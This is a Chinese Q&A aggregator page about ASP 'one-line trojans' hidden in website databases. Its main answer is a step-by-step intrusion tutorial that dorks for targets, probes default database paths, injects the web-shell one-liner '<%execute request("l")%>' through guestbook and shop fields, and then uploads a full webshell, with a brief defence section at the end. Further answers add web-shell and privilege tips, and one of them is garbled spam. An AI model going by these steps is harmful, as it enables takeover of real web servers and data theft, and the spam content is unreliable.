當前位置:首頁 » 操作系統 » 資料庫一句話木馬

資料庫一句話木馬

發布時間: 2022-02-23 16:09:53

A. 什麼是一句話木馬

一句話木馬的使用

實例一:「一句話木馬」入侵「EASYNEWS新聞管理系統」

「EASYNEWS新聞管理系統 v1.01 正式版」是在企業網站中非常常見的一套整站模版,在該網站系統的留言本組件中就存在著數據過濾不嚴漏洞,如果網站是默認路徑和默認文件名安裝的話,入侵者可以利用該漏洞直接上傳ASP木馬程序控制整個網站伺服器。

Step1 搜索入侵目標

使用了「EASYNEWS新聞管理系統 v1.01 正式版」的網站,在網站頁面的底部版權聲明處,往往會有關鍵字元為「www.****.COM 版權所有」。只要在GOOGLE或網路中以該字元串為關鍵詞進行搜索,就可以找到大量的入侵目標。

Step2 檢測入侵條件

在這里,我們以網站「http://www.****.com/news/index.htm」為例進行一次入侵檢測。「EASYNEWS新聞管理系統」網站的留言本資料庫文件默認是位於「\ebook\db\ebook.asp」,首先在瀏覽器地址欄中輸入「http://www.****.com/news/ebook/db/ebook.asp」,回車後在瀏覽器頁面中將顯示訪問留言本資料庫文件的返回信息。如果在頁面中顯示亂碼,則說明該網站的留言本資料庫文件沒有改名,可以進行入侵。

Step3 在資料庫中插入ASP後門

前面提到了該新聞系統的留言本插件存在過濾不嚴,因此我們可以通過提交發言,在資料庫中插入「一句話木馬」服務端代碼:

在瀏覽器中訪問「http://www.****.com/news/khly.htm」,打開提交留言頁面。在提交頁面中的「主頁」欄中,直接填寫「一句話木馬」服務端代碼,其它隨便填寫。確定後點擊「發表留言」按鈕,文章發表成功後,即可將「一句話木馬」服務端代碼插入到留言本資料庫中了。

Step4 連接後門上傳Webshell

由於留言本資料庫文件「ebook.asp」是一個ASP文件,所以我們插入到資料庫文件中的ASP語句將會被執行。將「一句話木馬」客戶端中的提交地址改為留言本資料庫文件地址,然後用瀏覽器打開客戶端,在上方的輸入框中輸入上傳ASP木馬的保存路徑,在下面的輸入框中可以粘貼入其它的ASP木馬代碼,這里選擇的是桂林老兵網站管理助手ASP代碼。點擊提交按鈕後,剛才粘貼的ASP木馬將被寫入到論壇伺服器中保存。

Step5 打開WEBSHELL

上傳的ASP木馬被保存到與資料庫文件同一WEB目錄下,文件名為「temp.asp」,因此我們在IE瀏覽器中打開頁面「http://www.****.com/news/ebook/db/temp.asp」,輸入默認的密碼「gxgl.com」,就可以看到一個WEBSHELL了。

在Webshell中可以上傳其它的文件或者安裝木馬後門、執行各種命令等,網站的伺服器已經掌握在我們的手中,可以為所欲為了。

實例二 「社區超市」入侵動網論壇

Step1 檢測入侵條件

以入侵論壇「http://www.****.com/」為例。首先在瀏覽器地址欄中輸入「http://www.****.com/data/shop.asp」,回車後在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區超市資料庫文件沒有改名或刪除,可以進行入侵。

Step2 在資料庫中插入ASP後門

登錄論壇後,點擊頁面中的「娛樂」→「社區超市」,打開社區超市頁面。在該頁面中選擇商店申請,打開「商店申請入駐」頁面「http://www.****.com/z_shop_newshop.asp」,在頁面中填寫任意信息,注意在「商店招牌」欄中,添加剛才的ASP代碼"〈%execute request("l")%〉"。確定後點擊「申請」按鈕進行提交,即可將ASP代碼保存在資料庫文件中了。

後面的步驟就與上面介紹的一樣了,只需要用藍屏木馬連接資料庫文件「http://sdoygb.w2.****.net/data/shop.asp」,然後上傳WEBSHELL就可以控制論壇伺服器了。

實例三 「一句話木馬」入侵未知網站

從上面的兩個例子,我們可以看出利用「一句話木馬」入侵控制存在資料庫過濾不嚴漏洞的網站,成功的前提是一定要知道網站的資料庫地址。對於一些使用了未知網頁程序的網站,我們如何才能找到它的資料庫地址呢?這就要結合暴庫或者跨站之類的方法了,下面只是結合一個簡單的暴庫,介紹一下利用一句話木馬入侵未知網站的方法。

Step1 暴庫得到資料庫路徑

以「http://bbs.****.com」為例。在瀏覽器中打開「http://bbs.****.com/join/listall.asp?bid=2」,將地址欄中join後的/改為%5c,在提交後的返回返回信息中可以看到網站資料庫地址:「』d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp』」,資料庫文件名中加入了「#」符號,「#」符號在IE中執行時被解釋為中斷符,要訪問該資料庫文件則必須將「#」號變為「23%」才可以。因此資料庫文件的實際WEB地址為「http://bbs.****.com/join/admin/adshuilonG!%23).asp」

Step2 注冊網站,插入「一句話木馬」

由於資料庫文件是ASP文件格式的,滿足入侵條件,因此現在我們需要將「一句話木馬」插入到資料庫文件中去。

在網頁上點擊注冊網站按鈕,打開注冊鏈接「http://bbs.****.com/join/add.asp過濾了=step3&bid=3」,在資料填寫頁面處的站點名稱或地址中寫入「一句話木馬」服務端代碼,其它隨便填寫。然後點擊完成按鈕提交數據,木馬服務端就被插入到資料庫文件中了。

最後只需要用藍屏木馬連接資料庫文件「http://bbs.****.com/join/admin/adshuilonG!%23).asp」,然後上傳ASP木馬就可以控制該網站的伺服器了。

「一句話木馬」的防範

要防範「一句話木馬」可以從兩方面進行,首先是要隱藏網站的資料庫,不要讓攻擊者知道資料庫文件的鏈接地址。這就需要管理員在網頁程序中查被暴庫漏洞,在資料庫連接文件中加入容錯代碼等,具體的防暴庫方法在這里就不作過多的講解了。

其次就是要防止用戶提交的數據未過濾漏洞,對用戶提交的數據進行過濾,替換一些危險的代碼等。例如中國站長聯盟網站在出現該漏洞後已經對網頁程序進行的修補,插入的ASP代碼中的〈、〉和"等字元會被網頁程序轉換成其它字元,致使服務端代碼無法正常執行。

只要作好這兩方面的安全工作,「一句話木馬」雖然無孔不入,但是面對這樣的網站系統也是無可奈何的了。

B. 一句話木馬 mdb+mssql資料庫操作

sql的sa許可權,還用來加資料庫許可權干什麼呢,應該可以直接加用戶啦,加了用戶,如果開了3389,就可以直接遠程了呀。

這加資料庫用戶···沒看到過,加也不會加。

C. 請問要想用一句話木馬拿到WEBSHELL是不是得知道其資料庫地址啊

要用一句話`!
首先要把一句話木馬插入頁面中`!
就是所說的備份資料庫`!
備份資料庫後綴是asp或asa等`!
然後恢復資料庫`!
用一句話木馬連接頁面連接`!
就出現一個小馬``!
給你寫大馬的`!

D. 資料庫 mssql 已經插入一句話木馬,怎麼使用一句話傳木馬在線等。

一句話木馬的作用就是為了方便上傳大馬,直接上傳你的WEBSHELL

E. 誰知道黑吧中級腳本入侵中的"資料庫與一句話木馬的完美結合"這一課所用到的blog系統是什麼

博拉(Bolaa)是全球領先的跨平台博客網路,中國第一博客門戶和口..
革新性的排氣泡奶瓶系統,輕松消除殘留食物 日康牌小雙柄奶瓶,使寶寶吸奶更加順暢 愛得利旋轉把柄大奶瓶,無毒、無味...blog network,簡稱BBN博客組織,它由中國最優秀的博客組成。《IT新品博客報》由BBN旗下專業的IT產品博客共同寫作,共同...

F. 沒有資料庫路徑能使用一句話木馬嗎添加到留言地方後,用菜刀連不上,是不是用留言時候的路徑還是什麼

你的攻擊方式叫做SQL注入,請查閱相關資料。

G. 一個網站注入了一句話木馬後怎麼看是在資料庫的名稱的啊

希望我的回答可以幫助樓主解決問題哦,我在這里十分不想給樓主潑涼水啊
我還是建議樓主不要輕易嘗試木馬,釣魚網站的任何操作,這樣不僅僅危害他人電腦,還會給自己的電腦同樣帶來病毒以及木馬的危害可能,如果你曾經這樣操作過的話還是先查殺病毒為妥,下面的方法給樓主參考
1.下載騰訊電腦管家-對電腦進行安全體檢,並且打開所有防火牆避免系統其餘文件的感染,防止病毒再次侵入,它是防禦病毒的第一道防線,尤其重要
2.打開電腦管家-殺毒-閃電查殺/全盤查殺,記得在殺毒時要打開小紅傘引擎。
3.為了更加安全,同樣可以對電腦進行頑固木馬的清理,方法很簡單,打開電腦管家-工具箱-安全-頑固木馬剋星來進行頑固木馬程序的清理
4.同時我也建議樓主哦,如果電腦存在系統高危漏洞時,電腦本身不安全是很容易感染病毒和木馬的,建議用電腦管家來經常進行系統漏洞的修復,方法為打開電腦管家-修復漏洞-一鍵修復
5.最好在殺毒或是清理過木馬以後盡量重啟電腦,確保清除多餘系統緩存文件,避免重復感染的問題產生。
6.平時也不要接陌生人發的文件和圖片,裡面很有可能加的木馬病毒,對於危險網站建議也不要進入,裡面也是有木馬的。
以上我的回答供樓主參考解決問題,望採納。

H. 一句話木馬已經上傳了,但資料庫格式是mdb 怎麼辦

你能夠將設資料庫下載下來分析么?用到mdb資料庫因該是asp的站點吧,直接上傳asp小馬到有執行許可權的目錄下訪問就行了,不一定非要往資料庫裡面寫東西。如果你把資料庫後綴改成asp的,網站可能就打不開了。

I. 在不知道該網站資料庫地址的情況下,用一句話木馬入侵有用嗎

一句話木馬要寫進一個文件/資料庫,一般寫進conn.asp文件 之後用中國菜刀連接一般都要進入後台操作

J. mysql資料庫中能插一句話木馬嘛

insert into 表名 values('木馬')

熱點內容
副武器腳本 發布:2024-09-21 05:37:30 瀏覽:126
隱藏頻道密碼是多少 發布:2024-09-21 05:32:21 瀏覽:121
觸動精靈腳本製作教程 發布:2024-09-21 05:13:14 瀏覽:399
自己編譯autojs 發布:2024-09-21 05:09:40 瀏覽:358
我的世界電腦版無政府伺服器 發布:2024-09-21 04:55:36 瀏覽:836
時間伺服器和筆記本電腦同步 發布:2024-09-21 04:48:04 瀏覽:762
無許可權訪問工作組的計算機 發布:2024-09-21 04:26:31 瀏覽:476
為什麼ipad需要密碼解鎖 發布:2024-09-21 04:06:22 瀏覽:211
mariadb存儲過程 發布:2024-09-21 03:56:05 瀏覽:515
壓縮殼脫殼機 發布:2024-09-21 03:14:33 瀏覽:94